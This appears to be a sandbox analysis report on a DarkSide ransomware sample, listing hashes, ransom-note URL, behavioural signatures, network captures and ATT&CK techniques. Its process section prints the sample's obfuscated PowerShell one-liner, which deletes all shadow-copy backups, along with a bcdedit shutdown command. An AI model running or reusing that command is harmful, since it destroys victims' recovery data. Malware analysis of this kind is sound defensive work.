Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
25/03/2025, 15:11 UTC
250325-skmbpsxzaw 1025/03/2025, 15:06 UTC
250325-sg1d6a1px2 1025/03/2025, 15:01 UTC
250325-sd5jpsxyct 1025/03/2025, 14:56 UTC
250325-sbdcfaxxgs 1025/03/2025, 14:50 UTC
250325-r7ve6a1nv3 1025/03/2025, 14:46 UTC
250325-r5ab7sxwhx 1025/03/2025, 14:40 UTC
250325-r2c9paxwe1 1005/02/2025, 10:25 UTC
250205-mgcefaslhw 1005/02/2025, 10:17 UTC
250205-mbs51atmbk 1005/02/2025, 09:15 UTC
250205-k785zs1pfn 10Analysis
-
max time kernel
109s -
max time network
113s -
platform
windows11-21h2_x64 -
resource
win11-20250314-en -
resource tags
-
submitted
25/03/2025, 14:50 UTC
General
-
Target
RansomwareSamples/DarkSide_01_05_2021_30KB.exe
-
Size
30KB
-
MD5
f00aded4c16c0e8c3b5adfc23d19c609
-
SHA1
86ca4973a98072c32db97c9433c16d405e4154ac
-
SHA256
4d9432e8a0ceb64c34b13d550251b8d9478ca784e50105dc0d729490fb861d1a
-
SHA512
a2697c2b008af3c51db771ba130590e40de2b0c7ad6f18b5ba284edffdc7a38623b56bc24939bd3867a55a7d263b236e02d1f0d718a5d3625402f2325cbfbedf
-
SSDEEP
768:lXnIczxCbTRNl71wHpZQgYI1TQPB3aYJEOW:hIMxCXd1+pZQgYIxk3vJE
Malware Config
Extracted
C:\Recovery\WindowsRE\README.ca14edc8.TXT
darkside
http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
Renames multiple (166) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Modifies Control Panel 1 IoCs
-
Modifies registry class 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 25 IoCs
-
Suspicious use of WriteProcessMemory 2 IoCs
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exeC:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe bcdedit /set shutdown /r /f /t 21⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
-
DNScatsdegree.comRemote address:8.8.8.8:53Requestcatsdegree.comIN AResponsecatsdegree.comIN CNAME77980.bodis.com77980.bodis.comIN A199.59.243.228 -
DNSctldl.windowsupdate.comRemote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEctldl.windowsupdate.com.delivery.microsoft.comctldl.windowsupdate.com.delivery.microsoft.comIN CNAMEwu-b-net.trafficmanager.netwu-b-net.trafficmanager.netIN CNAMEbg.microsoft.map.fastly.netbg.microsoft.map.fastly.netIN A199.232.214.172bg.microsoft.map.fastly.netIN A199.232.210.172
-
DNSx1.c.lencr.orgRemote address:8.8.8.8:53Requestx1.c.lencr.orgIN AResponsex1.c.lencr.orgIN CNAMEcrl.root-x1.letsencrypt.org.edgekey.netcrl.root-x1.letsencrypt.org.edgekey.netIN CNAMEe8652.dscx.akamaiedge.nete8652.dscx.akamaiedge.netIN A23.206.177.128
-
DNSr11.o.lencr.orgRemote address:8.8.8.8:53Requestr11.o.lencr.orgIN AResponser11.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A2.18.190.206a1887.dscq.akamai.netIN A2.18.190.198
-
DNS228.243.59.199.in-addr.arpaRemote address:8.8.8.8:53Request228.243.59.199.in-addr.arpaIN PTRResponse
-
DNStemisleyes.comRemote address:8.8.8.8:53Requesttemisleyes.comIN AResponse
-
DNSc.pki.googRemote address:8.8.8.8:53Requestc.pki.googIN AResponsec.pki.googIN CNAMEpki-goog.l.google.compki-goog.l.google.comIN A142.250.179.227
-
DNSnexusrules.officeapps.live.comRemote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.111.243.29
-
DNSnexusrules.officeapps.live.comRemote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN A
-
DNSnexusrules.officeapps.live.comRemote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN A
-
DNSnexusrules.officeapps.live.comRemote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN A
-
DNSnexusrules.officeapps.live.comRemote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN A
-
GEThttp://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3DRemote address:2.18.190.206:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r11.o.lencr.org
ResponseHTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "92A3DCC68E93C115CA84D3AFDF3A361C51D00D61AEB709765DF6F8B4C210E94D"
Last-Modified: Tue, 25 Mar 2025 14:14:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21599
Expires: Tue, 25 Mar 2025 20:51:53 GMT
Date: Tue, 25 Mar 2025 14:51:54 GMT
Connection: keep-alive
-
GEThttp://c.pki.goog/r/r1.crlRemote address:142.250.179.227:80RequestGET /r/r1.crl HTTP/1.1
Cache-Control: max-age = 3000
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog
ResponseHTTP/1.1 304 Not Modified
Date: Tue, 25 Mar 2025 14:48:15 GMT
Expires: Tue, 25 Mar 2025 15:38:15 GMT
Age: 279
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Cache-Control: public, max-age=3000
Vary: Accept-Encoding
-
199.59.243.228:443catsdegree.comtls
-
2.18.190.206:80http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3Dhttp
HTTP Request
GET http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgOPD1N7%2F8lTTs3OnT7ZlAvvEw%3D%3DHTTP Response
200 -
199.59.243.228:443catsdegree.comtls
-
142.250.179.227:80http://c.pki.goog/r/r1.crlhttp
HTTP Request
GET http://c.pki.goog/r/r1.crlHTTP Response
304
-
8.8.8.8:53catsdegree.comdns
DNS Request
catsdegree.com
DNS Response
199.59.243.228
DNS Request
ctldl.windowsupdate.com
DNS Response
199.232.214.172199.232.210.172
DNS Request
x1.c.lencr.org
DNS Response
23.206.177.128
DNS Request
r11.o.lencr.org
DNS Response
2.18.190.2062.18.190.198
DNS Request
228.243.59.199.in-addr.arpa
DNS Request
temisleyes.com
DNS Request
c.pki.goog
DNS Response
142.250.179.227
DNS Request
nexusrules.officeapps.live.com
DNS Request
nexusrules.officeapps.live.com
DNS Request
nexusrules.officeapps.live.com
DNS Request
nexusrules.officeapps.live.com
DNS Request
nexusrules.officeapps.live.com
DNS Response
52.111.243.29
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5f418a249405444da33cc73b402a26306
SHA11a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf
-
Filesize
3KB
MD5aa0a32b11dca7b04f4cc5fe8c55cb357
SHA100e354fd0754a7d721a270cdc08f970b9a3f6605
SHA256e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1
SHA5121db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30
-
Filesize
1KB
MD5f24476aabf4515ae0100773667aafab4
SHA1d225ade1d8b827f636af354b4fa649ad8f3d6a13
SHA256712c617c132a6aab3615aa14d3575f7eb1d16f487cb6b3302f0381a5601ace43
SHA5129c7cafdfe5cd7725d07c26a98a961d7f30eaef8272b66208c311862bb74d8cc2f446cb4c79147ea2dc05ec92f85c313539b107347195cb9cc1fdf3792243962f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
92KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
8KB